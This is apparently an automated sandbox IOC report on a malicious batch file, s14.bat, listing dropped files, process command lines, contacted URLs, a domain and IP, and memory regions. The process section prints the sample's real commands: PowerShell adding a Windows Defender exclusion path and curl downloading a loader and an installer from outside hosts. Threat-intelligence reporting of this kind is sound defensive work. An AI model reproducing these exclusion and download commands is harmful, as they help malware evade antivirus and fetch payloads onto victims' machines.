IOC Report
s14.bat

loading gif

Files

File Path
Type
Category
Malicious
s14.bat
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_021vghwn.wmz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0lciiolt.coi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b0na20a1.czt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrgqhyxv.f3a.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nb3rd5eu.sku.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ssxmx3vh.ues.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w2yprijk.v3v.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yqh0u2g4.3fg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\s14\l
ASCII text, with no line terminators
modified
C:\Users\user\AppData\Local\Temp\s14\stld2.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\s14\stld3.tmp
ASCII text, with CRLF line terminators
modified
\Device\ConDrv
ASCII text, with CR, LF line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 5 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\s14.bat" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Remove-MpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\reg.exe
reg query "HKU\S-1-5-19\Environment"
C:\Windows\System32\curl.exe
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk
C:\Windows\System32\curl.exe
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
C:\Windows\System32\timeout.exe
timeout 10
C:\Windows\System32\curl.exe
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
C:\Windows\System32\timeout.exe
timeout 10
C:\Windows\System32\curl.exe
curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://cdnbaynet.com/loader/link.php?prg_id=sfkkj
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeWinsta0
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe6M
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDATA=C:
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exetM
unknown
https://swtb-download.spyrix-sfk.co
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfk
167.114.14.170
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exei
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkcurl.exe
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkhmi
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfk9j
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exedM
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.execurl.exe
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkWinsta0
unknown
There are 5 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
cdnbaynet.com
167.114.14.170

IPs

IP
Domain
Country
Malicious
167.114.14.170
cdnbaynet.com
Canada
127.0.0.1
unknown
unknown

Memdumps

Base Address
Regiontype
Protect
Malicious
1C9F616E000
heap
page read and write
1E7C1B50000
heap
page read and write
3437FFF000
stack
page read and write
1C1E457D000
heap
page read and write
1D182574000
heap
page read and write
1C1E46F0000
heap
page read and write
3D4A8FF000
stack
page read and write
3D4A6FC000
stack
page read and write
343827F000
stack
page read and write
6DD2CFE000
stack
page read and write
2A82EC30000
heap
page read and write
1B142DD0000
heap
page read and write
1C9F6159000
heap
page read and write
1B1447F4000
heap
page read and write
2A82ECB0000
heap
page read and write
1C1E457B000
heap
page read and write
AF46A7E000
stack
page read and write
F9A937F000
stack
page read and write
1C1E45AB000
heap
page read and write
1C9F60B0000
heap
page read and write
1C1E4530000
heap
page read and write
1C1E454D000
heap
page read and write
1C1E44B0000
remote allocation
page read and write
1C1E4592000
heap
page read and write
1E7C1DC4000
heap
page read and write
1D182280000
heap
page read and write
1C1E456A000
heap
page read and write
6DD2AFD000
stack
page read and write
1C1E4541000
heap
page read and write
1C9F6454000
heap
page read and write
1C1E4592000
heap
page read and write
1C1E4390000
heap
page read and write
1B142E40000
heap
page read and write
1D182570000
heap
page read and write
1C1E4546000
heap
page read and write
1C1E454D000
heap
page read and write
1C1E4490000
heap
page read and write
1E7C1DC0000
heap
page read and write
3D4A7FE000
stack
page read and write
1D182360000
heap
page read and write
233D6278000
heap
page read and write
1C1E44B0000
remote allocation
page read and write
F9A927D000
stack
page read and write
233D61F0000
heap
page read and write
1D1823D0000
heap
page read and write
233D6270000
heap
page read and write
233D7D00000
heap
page read and write
1C9F6163000
heap
page read and write
AF46AFE000
stack
page read and write
6DD2BFE000
stack
page read and write
F255FE000
stack
page read and write
1B142E10000
heap
page read and write
1D182380000
heap
page read and write
1E7C1B98000
heap
page read and write
2A82EED0000
heap
page read and write
1B142E49000
heap
page read and write
1D1823EE000
heap
page read and write
1C1E454E000
heap
page read and write
F9A92FE000
stack
page read and write
1C1E45AB000
heap
page read and write
1E7C1BA1000
heap
page read and write
1D1823D9000
heap
page read and write
66D5FFF000
stack
page read and write
AF4679C000
stack
page read and write
1C9F60C0000
heap
page read and write
1C1E45AB000
heap
page read and write
2A82EED5000
heap
page read and write
1E7C1B90000
heap
page read and write
233D6240000
heap
page read and write
3437F7C000
stack
page read and write
66D5EFF000
stack
page read and write
1C9F6150000
heap
page read and write
1B142CF0000
heap
page read and write
1C1E4538000
heap
page read and write
1B1447F0000
heap
page read and write
1E7C1B60000
heap
page read and write
F256FF000
stack
page read and write
66D5B6D000
stack
page read and write
233D6200000
heap
page read and write
1C1E456A000
heap
page read and write
1C9F60E0000
heap
page read and write
2A82EC40000
heap
page read and write
1C1E4546000
heap
page read and write
1C1E4582000
heap
page read and write
233D7D04000
heap
page read and write
1C1E4543000
heap
page read and write
1C1E454D000
heap
page read and write
1C1E457C000
heap
page read and write
1E7C1D60000
heap
page read and write
2A82EC60000
heap
page read and write
1C1E4550000
heap
page read and write
F254FD000
stack
page read and write
1D1823E3000
heap
page read and write
1C1E456A000
heap
page read and write
1C1E4470000
heap
page read and write
2A82ECB7000
heap
page read and write
1C1E454D000
heap
page read and write
1C1E456A000
heap
page read and write
1C9F6450000
heap
page read and write
1C1E44B0000
remote allocation
page read and write
There are 90 hidden memdumps, click here to show them.